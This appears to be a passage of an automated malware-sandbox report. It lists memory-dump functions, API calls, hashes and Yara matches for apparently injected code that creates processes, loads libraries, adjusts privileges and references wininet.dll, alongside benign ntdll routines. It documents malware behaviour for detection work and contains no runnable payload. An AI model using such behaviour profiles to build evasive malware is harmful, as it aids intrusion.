                                                  • Opcode ID: 4a48261b4957998a333b2b28555a8b757b7c628ca90c6967dff1013e660b8f68
                                                  • Instruction ID: f70809a16e8b0cea12a8f5ad041c9517fcedef886100498a741a9c0c000d3c14
                                                  • Opcode Fuzzy Hash: 4a48261b4957998a333b2b28555a8b757b7c628ca90c6967dff1013e660b8f68
                                                  • Instruction Fuzzy Hash: E29002E134100482F50065594515B16004DD7E1345F51C025E1055554D9699DC527176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1515c5741c3351c7d79751d8c245a9d2f4d5f1c2a61bd12452fc9eb9adc89ffc
                                                  • Instruction ID: 1ba0a98f65fe2ae7e596ab31d90ae13c49472793141604adb8dcf84f7e85451b
                                                  • Opcode Fuzzy Hash: 1515c5741c3351c7d79751d8c245a9d2f4d5f1c2a61bd12452fc9eb9adc89ffc
                                                  • Instruction Fuzzy Hash: 989002B120100842F5807559450565A004D97D1345F91C025A0016654DDA95DE5977F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 69c2e4fac2635376e37ba931f3fb29dcb4da9f584f0807c12eb5ad3bbd11b87f
                                                  • Instruction ID: b7d651d2b6f38da9957eb909f20ca66fd29b0326292d544f413a5ba53277986a
                                                  • Opcode Fuzzy Hash: 69c2e4fac2635376e37ba931f3fb29dcb4da9f584f0807c12eb5ad3bbd11b87f
                                                  • Instruction Fuzzy Hash: 479002B120504882F54075594505A56005D97D0349F51C021A0055694DA6A5DD55B6B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4a38d321f73bf1ae08b1d2b519f7d35534feb8b793ec4181e89ea29d54a0bd17
                                                  • Instruction ID: 2c993f76c562edae348d6e4f3cd92925e6bff105cb48d4402da1d7f3dd2a466a
                                                  • Opcode Fuzzy Hash: 4a38d321f73bf1ae08b1d2b519f7d35534feb8b793ec4181e89ea29d54a0bd17
                                                  • Instruction Fuzzy Hash: 409002A121180082F60069694D15B17004D97D0347F51C125A0145554CD995DC616571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6032b1c9cef4912a16493c93e501cc449e27be86d8462885c56cc20a9555b0d9
                                                  • Instruction ID: 13e9f8d1d63d5ad93c04461c342634f2d9da3c957b7c74adc4c6278e8e822ae1
                                                  • Opcode Fuzzy Hash: 6032b1c9cef4912a16493c93e501cc449e27be86d8462885c56cc20a9555b0d9
                                                  • Instruction Fuzzy Hash: 4F9002B120108842F5106559850575A004D97D0345F55C421A4415658D96D5DC917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a398ddb86e3c3cab4cc4cd96dcb50a2520a288bb0e9d84c1a0f2f908e80449e2
                                                  • Instruction ID: abb175d97814a5c583d61ce57160745ec8ca1076e98e1fc98946e1992270de4e
                                                  • Opcode Fuzzy Hash: a398ddb86e3c3cab4cc4cd96dcb50a2520a288bb0e9d84c1a0f2f908e80449e2
                                                  • Instruction Fuzzy Hash: B09002B120100882F50065594505B56004D97E0345F51C026A0115654D9695DC517571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a0d36512a7181614158a1a522f116f9e13ee0e62863b6ada2386fe6debf74412
                                                  • Instruction ID: 496f85c8b7d0b043f18f7be08114dc250acf6d1ee0b076e5c1c2e412ba915c11
                                                  • Opcode Fuzzy Hash: a0d36512a7181614158a1a522f116f9e13ee0e62863b6ada2386fe6debf74412
                                                  • Instruction Fuzzy Hash: E99002B120100442F50069995509656004D97E0345F51D021A5015555ED6E5DC917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f61f6cc4bf382808a9b337576191baf86398d371cee184ffd04b64dd1f0c0611
                                                  • Instruction ID: 5668487d4d264ac1bc60edbaf77c270ff302964de96fe6412529c5f4e44e6b2e
                                                  • Opcode Fuzzy Hash: f61f6cc4bf382808a9b337576191baf86398d371cee184ffd04b64dd1f0c0611
                                                  • Instruction Fuzzy Hash: D19002B131114442F51065598505716004D97D1245F51C421A0815558D96D5DC917172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ce04a898f6101d1794009ec8fa788776a97ffe408e43b2c4fda53db126c482c
                                                  • Instruction ID: 2eb7e6b13992cd1e79938971c028c0ad662f7f56db6354b6c5f8608f73bbcf74
                                                  • Opcode Fuzzy Hash: 8ce04a898f6101d1794009ec8fa788776a97ffe408e43b2c4fda53db126c482c
                                                  • Instruction Fuzzy Hash: BC9002A921300042F5807559550961A004D97D1246F91D425A0006558CD995DC696371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02978912, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73processmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFreeHeapInternalProcess
                                                  • String ID: .z`
                                                  • API String ID: 1438695366-1441809116
                                                  • Opcode ID: 90c160840e02278545702d0915215471d885d0144c954935cf438603df58f7ba
                                                  • Instruction ID: f379709604604de043309c2262b19ceaaed2e277cfb7c3b69f512210fc5dd530
                                                  • Opcode Fuzzy Hash: 90c160840e02278545702d0915215471d885d0144c954935cf438603df58f7ba
                                                  • Instruction Fuzzy Hash: 4F1129B2204209BBDB14DFA8DC84EEB77ADEF88750F058659FA0C97241D630E915CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029772F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02977398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 50492d0dbda04b2cb5e117d9845e961fee4babb36efbd713bebedc9de0916669
                                                  • Instruction ID: 16b4fe9ddd58a23e7ce43439dc420ac60222ae57231f1c9b0a482479873a51f2
                                                  • Opcode Fuzzy Hash: 50492d0dbda04b2cb5e117d9845e961fee4babb36efbd713bebedc9de0916669
                                                  • Instruction Fuzzy Hash: 123192B6641704ABC715DFA4D8A0FABB7B9BF88704F00851DFA1A5B241D730A445CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029772E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02977398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: bb7dca2a574678c6730806648a2c3eb8eddc1f560d044721c5c1430feb9ebf59
                                                  • Instruction ID: eef75c97eb096181fb2277d4e14ac51402769eba3bc9df8f9d74bffcf2ce2325
                                                  • Opcode Fuzzy Hash: bb7dca2a574678c6730806648a2c3eb8eddc1f560d044721c5c1430feb9ebf59
                                                  • Instruction Fuzzy Hash: 6031B1B2641605ABC711EFA4C8A0FABBBB9BF88704F008429F9199B241D370A455CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029788D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 6c86cf10018408c8f8833f0748349ecafde25b092cf818c458cd3e2de167d509
                                                  • Instruction ID: 1fbcde30208ccecddb6590573cc32ead9cc541219afdfea23f6f580bb57f11e3
                                                  • Opcode Fuzzy Hash: 6c86cf10018408c8f8833f0748349ecafde25b092cf818c458cd3e2de167d509
                                                  • Instruction Fuzzy Hash: 36F082B12002146FEB18DFA8DC48EEB77A8EF89324F104A59FD6C97251D231E911CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029788E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction ID: bf6cefff6cc0d535b62222a2b7d07da47d6e445a6ff640791ba51bf848419c73
                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction Fuzzy Hash: 73E046B1200208AFDB18EF99CC48EA777ADEF88750F018558FE085B241C630F910CAF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02967290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029672EA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0296730B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction ID: 5dbcdcd2a8f970e93d9f75d1c0c9133d3640189d106831a866c4bfdeed9ab11d
                                                  • Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction Fuzzy Hash: BF01A231A8022877F721AA949C02FFE77AC9F40B55F154158FF04BA1C0EAA469064BF6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02967263, Relevance: 3.0, APIs: 2, Instructions: 38threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029672EA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0296730B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: b1211adde592bdd3974a86e3140faf6a01633492fc22d546a6a85f028fd0133c
                                                  • Instruction ID: a609e585bfcae317e764b64cfcb869ffb5ebd49fdd70d1cce0ac705dc3d00f4d
                                                  • Opcode Fuzzy Hash: b1211adde592bdd3974a86e3140faf6a01633492fc22d546a6a85f028fd0133c
                                                  • Instruction Fuzzy Hash: 32F0E531AC022832E22115D46D06FFEB3DDDB80F55F140059FF04EB2C0EAD4641507E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02969B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02969BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 4a9f4d7cc2de21a2a59c1c6c04bcf380de393013e39651ddca7363bcf16a5d13
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 1A0121B5D4020EABDF10EBE4DC45FEDB7B99B54308F1045A5E90897240F671EB54CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02978950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: 8af7829bf28189b9e222edfbc8939e74fa2b51b3ac4a47600c4e123612e5f734
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: 3C01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02977420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0296CD00,?,?), ref: 0297745C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                  • Instruction ID: a567aaa89313dd6f34e2f959452894bb6ebc8e3b2e608328d8d45652c35d25e1
                                                  • Opcode Fuzzy Hash: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                  • Instruction Fuzzy Hash: 2AE065333802147AE22065A9AC02FA7B69DDBC1B24F14002AFA0DEA2C0DA95F80146A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029789AC, Relevance: 1.5, APIs: 1, Instructions: 25processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: f35f31085e8118c2a5653f5c355627369c6e7b0c2844810f68138dec3ef4e0cf
                                                  • Instruction ID: 024ad6e5750f38c71eee8c2196fc7102bd3b135f022a7f02b7eeb38f2d21f234
                                                  • Opcode Fuzzy Hash: f35f31085e8118c2a5653f5c355627369c6e7b0c2844810f68138dec3ef4e0cf
                                                  • Instruction Fuzzy Hash: EDE076B2214009AF8B08CF89EC90CEB73EEAF8C314B118608BA0DD3200D630E8118BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02978A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0296CFD2,0296CFD2,?,00000000,?,?), ref: 02978A70
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: e17093ba378509a46846d32bbba1c678add93aac60e071e6e2f4b79e7cea0aa2
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: BFE01AB12002086BDB14DF49CC84EE737ADEF88650F018154BE0857241C930E8108BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029788A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02973546,?,02973CBF,02973CBF,?,02973546,?,?,?,?,?,00000000,00000000,?), ref: 029788CD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction ID: 4937dabb59f61a355b7174f9aae48596b30bfb901fda578e0572bf6240c6dec3
                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction Fuzzy Hash: C8E012B1200208ABDB18EF99CC44EA777ADEF88650F118558BE085B241C630F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0296D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02967C93,?), ref: 0296D46B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction ID: 44e1741853714ff3bcbfecab6e704c1caa97256c457606dcd184b49bec81f6d2
                                                  • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction Fuzzy Hash: CED0A7717503087BE610FAA89C07F2632CD5B84B04F494064F94DD73C3DA50F4004575
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02969B43, Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02969BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction ID: 718688f60a12a3078948cc8a75891898ca758498b7f2a3dbb7f969b471a7a61f
                                                  • Opcode Fuzzy Hash: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction Fuzzy Hash: 11D0A72050E2887F9B26C668581996DFFA4EF91110B08CAEEC889AB2C3C5304909C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0468967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6063949790a8030f1e24fc1614c0a54bbc070f4e190129692670588d5804cc2c
                                                  • Instruction ID: 7856a43b0f4a27b3f7fd8835372aa626cbd372f5a094cf5fbbc93dde6dd4e675
                                                  • Opcode Fuzzy Hash: 6063949790a8030f1e24fc1614c0a54bbc070f4e190129692670588d5804cc2c
                                                  • Instruction Fuzzy Hash: 34B02BF19010C0C5FB00EB6007087373A0477D0300F12C021D1020240A0378D4C0F1B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 046DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E046DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0468CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E046D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E046D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x046dfdda
                                                  0x046dfde2
                                                  0x046dfde5
                                                  0x046dfdec
                                                  0x046dfdfa
                                                  0x046dfdff
                                                  0x046dfe0a
                                                  0x046dfe0f
                                                  0x046dfe17
                                                  0x046dfe1e
                                                  0x046dfe19
                                                  0x046dfe19
                                                  0x046dfe19
                                                  0x046dfe20
                                                  0x046dfe21
                                                  0x046dfe22
                                                  0x046dfe25
                                                  0x046dfe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 046DFDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046DFE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046DFE01
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 25cd0b3fbaddd8a6447d984b39f2bc941e61892c57772885b2bef688ed3fe5ed
                                                  • Instruction ID: f67789fe1787184912aa16e7c597e6554e0709cbf64738ff2cc79b4aae9b796f
                                                  • Opcode Fuzzy Hash: 25cd0b3fbaddd8a6447d984b39f2bc941e61892c57772885b2bef688ed3fe5ed
                                                  • Instruction Fuzzy Hash: 22F0F672A00241BFE7341A45DC06F23BB5AEB44B31F244358F628565D1FA62F82096F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%